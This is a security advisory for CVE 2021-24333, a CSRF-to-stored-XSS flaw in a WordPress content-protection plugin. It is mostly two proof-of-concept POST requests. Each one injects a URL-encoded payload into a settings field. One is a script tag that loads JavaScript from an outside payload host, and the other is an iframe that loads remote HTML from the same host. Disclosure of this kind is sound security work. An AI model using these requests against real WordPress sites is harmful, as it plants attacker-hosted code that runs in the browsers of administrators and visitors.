Content Copy Protection & Prevent Image Save <= 1.3 – CSRF to Stored Cross-Site Scripting (XSS) | CVE 2021-24333

Description

The plugin does not check for CSRF when saving its settings, not perform any validation and sanitisation on them, allowing attackers to make a logged in administrator set arbitrary XSS payloads in them.

Proof of Concept

### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Image saving disabled message text: ]

[!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cookie: [admin cookies]

select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&CTRLS=1&cmenu=1&no_menu_msg=PoC+by+m0ze&Save_Options=++Update+Options++



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Context menu disabled message text: ]

[!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Cookie: [admin cookies]

select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=PoC+by+m0ze&CTRLS=1&cmenu=1&no_menu_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++